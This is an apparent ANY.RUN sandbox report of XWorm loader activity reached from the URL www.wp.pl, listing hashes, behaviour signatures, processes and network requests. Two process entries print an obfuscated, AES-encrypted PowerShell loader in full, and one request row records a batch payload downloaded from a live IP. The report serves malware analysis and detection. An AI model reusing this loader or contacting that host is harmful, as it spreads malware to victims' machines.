URL:

www.wp.pl

Full analysis: https://app.any.run/tasks/4519a7f4-9e2e-4790-973e-056eb9efc828
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 10, 2025, 15:48:52
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
opendir
remote
xworm
Indicators:
MD5:

CF28373A52818D8A8E1E5C192F5BF876

SHA1:

9B09B31809B47914418387DE05E7605C0565D34C

SHA256:

F53CC507F72B8DA90E5EC3B0C9E19373B963B02F68C425A11BA1194454660F56

SSDEEP:

3:Eoj:Hj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3524)
      • powershell.exe (PID: 4704)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3524)
      • powershell.exe (PID: 4704)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 3524)
      • powershell.exe (PID: 4704)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 3524)
      • powershell.exe (PID: 4704)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 5404)
      • cmd.exe (PID: 3984)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 3524)
      • powershell.exe (PID: 4704)

    • XWORM has been detected (SURICATA)

      • powershell.exe (PID: 4704)

  • SUSPICIOUS

    • Process requests binary or script from the Internet

      • curl.exe (PID: 7728)

    • Connects to unusual port

      • curl.exe (PID: 7728)
      • powershell.exe (PID: 4704)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3984)
      • cmd.exe (PID: 5404)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 3984)
      • cmd.exe (PID: 5404)

    • Cryptography encrypted command line is found

      • powershell.exe (PID: 3524)
      • powershell.exe (PID: 4704)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3984)
      • cmd.exe (PID: 5404)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 3420)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 3420)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3420)

    • The process executes VB scripts

      • powershell.exe (PID: 3524)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 4704)

    • The system shut down or reboot

      • powershell.exe (PID: 4704)

  • INFO

    • Application launched itself

      • msedge.exe (PID: 6700)
      • msedge.exe (PID: 8120)

    • Checks supported languages

      • identity_helper.exe (PID: 7448)
      • curl.exe (PID: 7728)

    • Reads the computer name

      • identity_helper.exe (PID: 7448)

    • Manual execution by a user

      • cmd.exe (PID: 7316)
      • cmd.exe (PID: 3984)

    • Execution of CURL command

      • cmd.exe (PID: 7316)

    • Reads Environment values

      • identity_helper.exe (PID: 7448)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4704)
      • powershell.exe (PID: 3524)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4704)
      • powershell.exe (PID: 3524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
192
Monitored processes
58
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs cmd.exe no specs conhost.exe no specs curl.exe rundll32.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs #XWORM powershell.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs shutdown.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
640"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5144 --field-trial-handle=2500,i,17576311877270814787,13089027449690703258,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1412C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
3420"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Realtek-Hub\dewrvzt0mzr10.vbs" C:\Windows\System32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3524"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxdwVCPCgMSsIsCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.MemoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New-Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\admin\SquareSpace.bat';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsWith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break; }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3652\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3736"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4348 --field-trial-handle=2500,i,17576311877270814787,13089027449690703258,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3984C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\SquareSpace.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
4076"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4204 --field-trial-handle=2500,i,17576311877270814787,13089027449690703258,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4204"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4332 --field-trial-handle=2500,i,17576311877270814787,13089027449690703258,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4704"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxdwVCPCgMSsIsCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.MemoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New-Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\admin\AppData\Local\Realtek-Hub\dewrvzt0mzr10.bat';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsWith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break; }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1073807364
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
Total events
16 599
Read events
16 568
Write events
31
Delete events
0

Modification events

(PID) Process:(6292) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6292) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6292) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6292) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(6292) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(6292) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
Operation:writeName:DisableFirstRunCustomize
Value:
1
(PID) Process:(6700) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(6700) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(6700) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(6700) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
Executable files
12
Suspicious files
325
Text files
93
Unknown types
0

Dropped files

PID
Process
Filename
Type
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF135c5c.TMP
MD5:
SHA256:
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF135c5c.TMP
MD5:
SHA256:
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF135c6b.TMP
MD5:
SHA256:
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF135c6b.TMP
MD5:
SHA256:
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF135c6b.TMP
MD5:
SHA256:
6700msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
31
TCP/UDP connections
92
DNS requests
95
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.173:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5448
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
7728
curl.exe
GET
200
45.88.186.152:55553
http://45.88.186.152:55553/folder/SquareSpace.bat
unknown
malicious
7120
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6516
backgroundTaskHost.exe
GET
200
2.23.77.188:80
